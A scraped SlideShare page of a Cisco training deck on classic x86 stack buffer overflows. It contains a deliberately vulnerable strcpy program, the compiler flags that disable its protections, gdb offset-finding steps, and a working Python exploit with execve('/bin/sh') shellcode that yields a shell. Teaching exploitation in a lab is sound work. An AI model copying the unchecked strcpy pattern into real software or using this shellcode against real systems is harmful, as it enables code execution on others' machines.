SlideShare a Scribd company logo
1 of 15
Thank you Aleph One! 
Refresher on buffer overflow in the old days 
Alex Moneger 
Security Engineer
Buffer overflow refresher 
 First paper by Aleph One in 1996 in Phrack #49: 
http://www.phrack.org/issues.html?issue=49&id=14 
 No OS level protections at the time 
 Works by writing past the buffer end aka stuff more data into a buffer 
then it can hold 
 Goal is to overwrite something interesting control structure with our 
attacker data. Can de saved EIP, but can be any function pointer 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
Stack refresher (again ;)) 
 Stack holds local variables, the address of the 
previous frame, the address of where to return 
to 
 Goal is to overwrite Saved EIP (referred to as 
SEIP) 
 If we control SEIP, we control where “ret” 
instruction will go, meaning we control EIP 
SEIP 
SEBP 
Local function storage 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 3
The “classic” 
cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c 
#include <string.h> 
int vuln(char *stuff) { 
char buf[0x64] = {0}; 
strcpy(buf, stuff); 
return 1; 
} 
int main(int argc, char **argv) { 
vuln(argv[1]); 
return 0; 
} 
 “Buf” has no boundary checking. “stuff” is 
attacker controlled 
SEIP 
SEBP 
Buf 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 4
Making it exploitable 
 Previous program compiled with following options: 
cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize 
kernel.randomize_va_space = 0 
cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE –g -o ch3 
 See how many security features we are disabling? 
 Pretend we don’t have sources, find the size of the local stack storage 
in function prologue 
cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color 
esp 
804841d: 89 e5 mov ebp,esp 
8048421: 83 c4 80 add esp,0xffffff80 
cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' 
-128 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 5
Recon 
 Local storage for func is 128 bytes. Nothing says 
that our vulnerable buf starts at the beginning of 
that 
 Let’s figure out how much we need to overwrite to 
control EIP 
 Max overwrite size = ebp – esp + SEBP + SEIP = 
128 + 4 + 4 = 136 
SEIP 
SEBP 
???? 
Buf 
???? 
1 
2 
8 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 6
Finding the offsets manually 
cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' 
A => 0x41 B => 0x42 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14 
 Doing this properly => Use msf pattern_create.rb & pattern_offset.rb 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 7
We’re going to overflow!!! 
1. Choose a shellcode 
2. Compute it’s length: ie: 40 bytes 
3. Add the proper padding to overwrite SEIP: 112 - 40 = 72 
4. Find the address of our shellcode 
5. Append to the buffer to redirect flow 
Shellcode Junk 
SC 
Add 
ress 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 8
Finding buffer address 
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') 
Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. 
gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 
804844e: 83 ec 80 sub esp,0xffffff80 
8048451: 5b pop ebx 
8048452: 5f pop edi 
8048453: 5d pop ebp 
8048454: c3 ret 
gdb$ gdb$ break *0x804844e 
Breakpoint 1 at 0x804844e: file ch3.c, line 9. 
gdb$ r 
gdb$ x/16w $esp 
0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 
0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 
0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 
gdb$ x/x 0xbffffc8c 
0xbffffc8c: 0x41414141 
gdb$ x/s 0xbffffc8c 
0xbffffc8c: 'A' <repeats 112 times>, "BBBB" 
gdb$ x/2w $ebp 
0xbffffcf8: 0x41414141 0x42424242 
gdb$ si 5 
--------------------------------------------------------------------------[regs] 
EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C 
ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop: 
Cannot access memory at address 0x42424242 
0x42424242 in ?? () 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
Summary 
 We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP 
overwrite) 
 We have the buffer’s address (0xbffffc8c) 
 We have a shellcode (I’m a nice guy) 
 Stuff all of it together 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 10
Shell time 
cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py 
#!/usr/bin/env python 
# -*- coding: utf-8 -*- 
import os 
import struct 
target = "ch3" 
overflow_len = 112 
ret_addr = 0xbffffc8c 
target_path = os.path.abspath(target) 
# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) 
sc = ("x6ax31x58x99xcdx80x89xc3x89xc1x6ax46" 
"x58xcdx80xb0x0bx52x68x6ex2fx73x68x68" 
"x2fx2fx62x69x89xe3x89xd1xcdx80") 
nop_sled = overflow_len - len(sc) 
sc_addr = struct.pack("<I", ret_addr) 
ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) 
os.execve(target_path, (target_path, ex), os.environ) 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 11
Result 
cisco@kali:~/src/seccon/ch3$ invoke ch3.py 
$ id 
uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) 
$ exit 
cisco@kali:~/src/seccon/ch3$ 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 12
Variations 
 Small buffers (shellcode doesn’t fit): append shellcode after ret address 
SC 
Add 
ress 
Junk Shellcode 
 Unpredictable buffer address (stack size is not under control): append 
NOP sled in front of shellcode: 
NOP sled Shellcode 
SC 
Add 
ress 
 Use an environment variable to host your shellcode 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 13
Limitations 
 Shellcode on executed on the stack, so stack needs to be executable 
 Buffer address is known, so addresses can’t be randomized 
 Stack frame is not protected (more on this later) 
 There are no null bytes in our buffer address (This can fixed easily) 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 14
Now get to work 
 Compile and exploit ch3 
 Try any different exploitation technique described previously 
 Don’t use the “invoke” script when trying to exploit. What is happening 
to the stack? Why is your exploit failing? 
 Enable one memory protection (whichever). Check the effect on the 
exploit 
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 15

More Related Content

What's hot

Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Ontico
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
2016年のPerl (Long version)
2016年のPerl (Long version)2016年のPerl (Long version)
2016年のPerl (Long version)charsbar
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Svetlana Gaivoronski
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programmingkayalkarnan
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Huntingsanghwan ahn
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Moduleast_j
 
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 codeBetter detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 codecharsbar
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Dosanghwan ahn
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersDevDay Dresden
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이GangSeok Lee
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPsanghwan ahn
 

What's hot (20)

Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)Performance tweaks and tools for Linux (Joe Damato)
Performance tweaks and tools for Linux (Joe Damato)
 
Mini CTF workshop dump
Mini CTF workshop dumpMini CTF workshop dump
Mini CTF workshop dump
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
2016年のPerl (Long version)
2016年のPerl (Long version)2016年のPerl (Long version)
2016年のPerl (Long version)
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
 
Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86Shellcodes for ARM: Your Pills Don't Work on Me, x86
Shellcodes for ARM: Your Pills Don't Work on Me, x86
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programming
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg HuntingSystem Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
 
Publishing a Perl6 Module
Publishing a Perl6 ModulePublishing a Perl6 Module
Publishing a Perl6 Module
 
Better detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 codeBetter detection of what modules are used by some Perl 5 code
Better detection of what modules are used by some Perl 5 code
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
A Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They DoA Stealthy Stealers - Spyware Toolkit and What They Do
A Stealthy Stealers - Spyware Toolkit and What They Do
 
Alexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for DevelopersAlexander Reelsen - Seccomp for Developers
Alexander Reelsen - Seccomp for Developers
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
 
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochKernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
Kernel Recipes 2017 - Modern Key Management with GPG - Werner Koch
 
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
[2012 CodeEngn Conference 06] pwn3r - Secuinside 2012 CTF 예선 문제풀이
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIPSystem Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
 

Viewers also liked

Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacksAlexandre Moneger
 
你今天加班了嗎
你今天加班了嗎你今天加班了嗎
你今天加班了嗎Wei-ming Chen
 
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poderJoel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poderActor Quantum
 
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and ReconnaissanceCyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and ReconnaissanceCyberLab
 
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution ImplementationPlan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution ImplementationJ. Kevin Parker, CIP
 
Indicadores emprendimiento
Indicadores emprendimiento Indicadores emprendimiento
Indicadores emprendimiento nico2754
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門Tyler Chen
 
Web api scalability and performance
Web api scalability and performanceWeb api scalability and performance
Web api scalability and performanceHimanshu Desai
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsAlexandre Moneger
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacksAlexandre Moneger
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceAlexandre Moneger
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersAlexandre Moneger
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defencehackstuff
 

Viewers also liked (19)

Practical rsa padding oracle attacks
Practical rsa padding oracle attacksPractical rsa padding oracle attacks
Practical rsa padding oracle attacks
 
党参
党参党参
党参
 
你今天加班了嗎
你今天加班了嗎你今天加班了嗎
你今天加班了嗎
 
Joel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poderJoel s. goldsmith consciência do único poder
Joel s. goldsmith consciência do único poder
 
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and ReconnaissanceCyberLab CCEH Session - 2 Footprinting and Reconnaissance
CyberLab CCEH Session - 2 Footprinting and Reconnaissance
 
Plan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution ImplementationPlan a Successful Information Management Solution Implementation
Plan a Successful Information Management Solution Implementation
 
Indicadores emprendimiento
Indicadores emprendimiento Indicadores emprendimiento
Indicadores emprendimiento
 
20161112
20161112 20161112
20161112
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
 
Web api scalability and performance
Web api scalability and performanceWeb api scalability and performance
Web api scalability and performance
 
韩国茶
韩国茶韩国茶
韩国茶
 
PCNA Trends 2017
PCNA Trends 2017PCNA Trends 2017
PCNA Trends 2017
 
Tea making
Tea makingTea making
Tea making
 
ROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploitsROP ‘n’ ROLL, a peak into modern exploits
ROP ‘n’ ROLL, a peak into modern exploits
 
Pentesting custom TLS stacks
Pentesting custom TLS stacksPentesting custom TLS stacks
Pentesting custom TLS stacks
 
NBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then iceNBTC#2 - Why instrumentation is cooler then ice
NBTC#2 - Why instrumentation is cooler then ice
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defence
 
Research methodology
Research methodologyResearch methodology
Research methodology
 

Similar to 03 - Refresher on buffer overflow in the old days

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stackAlexandre Moneger
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen oneAlexandre Moneger
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionlinuxlab_conf
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...Faisal Akber
 
Airlover 20030324 1
Airlover 20030324 1Airlover 20030324 1
Airlover 20030324 1Dr.Ravi
 
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Composeraccoony
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
 
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016StackIQ
 
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker CaptainsDCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker CaptainsDocker, Inc.
 
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...Matthew Ahrens
 
Overloading Perl OPs using XS
Overloading Perl OPs using XSOverloading Perl OPs using XS
Overloading Perl OPs using XSℕicolas ℝ.
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCanSecWest
 
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run  make qemu-nox  In a putty terminal but it.pdfIm trying to run  make qemu-nox  In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdfmaheshkumar12354
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016Susan Potter
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)David de Boer
 
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf ToolsProfiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf ToolsemBO_Conference
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 

Similar to 03 - Refresher on buffer overflow in the old days (20)

02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
Davide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruptionDavide Berardi - Linux hardening and security measures against Memory corruption
Davide Berardi - Linux hardening and security measures against Memory corruption
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
PGCon 2014 - What Do You Mean my Database Server Core Dumped? - How to Inspec...
 
Airlover 20030324 1
Airlover 20030324 1Airlover 20030324 1
Airlover 20030324 1
 
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
파이썬 개발환경 구성하기의 끝판왕 - Docker Compose
 
Linux networking
Linux networkingLinux networking
Linux networking
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)
 
Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016Salesforce at Stacki Atlanta Meetup February 2016
Salesforce at Stacki Atlanta Meetup February 2016
 
DCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker CaptainsDCEU 18: Tips and Tricks of the Docker Captains
DCEU 18: Tips and Tricks of the Docker Captains
 
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
Improving the ZFS Userland-Kernel API with Channel Programs - BSDCAN 2017 - M...
 
Overloading Perl OPs using XS
Overloading Perl OPs using XSOverloading Perl OPs using XS
Overloading Perl OPs using XS
 
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacketCsw2016 wheeler barksdale-gruskovnjak-execute_mypacket
Csw2016 wheeler barksdale-gruskovnjak-execute_mypacket
 
Im trying to run make qemu-nox In a putty terminal but it.pdf
Im trying to run  make qemu-nox  In a putty terminal but it.pdfIm trying to run  make qemu-nox  In a putty terminal but it.pdf
Im trying to run make qemu-nox In a putty terminal but it.pdf
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
From Zero To Production (NixOS, Erlang) @ Erlang Factory SF 2016
 
Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)Being functional in PHP (PHPDay Italy 2016)
Being functional in PHP (PHPDay Italy 2016)
 
Profiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf ToolsProfiling your Applications using the Linux Perf Tools
Profiling your Applications using the Linux Perf Tools
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 

Recently uploaded

SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....
SATELITE COMMUNICATION UNIT 1 CEC352 REGULATION 2021 PPT BASICS OF SATELITE ....santhyamuthu1
 
Power System electrical and electronics .pptx
Power System electrical and electronics .pptxPower System electrical and electronics .pptx
Power System electrical and electronics .pptxMUKULKUMAR210
 
Gender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 ProjectGender Bias in Engineer, Honors 203 Project
Gender Bias in Engineer, Honors 203 Projectreemakb03
 
Guardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSecGuardians and Glitches: Navigating the Duality of Gen AI in AppSec
Guardians and Glitches: Navigating the Duality of Gen AI in AppSecTrupti Shiralkar, CISSP
 
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docxSUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docx
SUMMER TRAINING REPORT ON BUILDING CONSTRUCTION.docxNaveenVerma126
 
cme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answerscme397 surface engineering unit 5 part A questions and answers
cme397 surface engineering unit 5 part A questions and answerskarthi keyan
 
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdfsdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdf
sdfsadopkjpiosufoiasdoifjasldkjfl a asldkjflaskdjflkjsdsdfJulia Kaye
 
Phase noise transfer functions.pptx
Phase noise transfer      functions.pptxPhase noise transfer      functions.pptx
Phase noise transfer functions.pptxSaiGouthamSunkara
 
cloud computing notes for anna university syllabus
cloud computing notes for anna university syllabuscloud computing notes for anna university syllabus
cloud computing notes for anna university syllabusViolet Violet
 
Design Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptxDesign Analysis of Alogorithm 1 ppt 2024.pptx
Design Analysis of Alogorithm 1 ppt 2024.pptxrajesshs31r
 
Mohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptxMohs Scale of Hardness, Hardness Scale.pptx
Mohs Scale of Hardness, Hardness Scale.pptxKISHAN KUMAR
 
Strategies of Urban Morphologyfor Improving Outdoor Thermal Comfort and Susta...
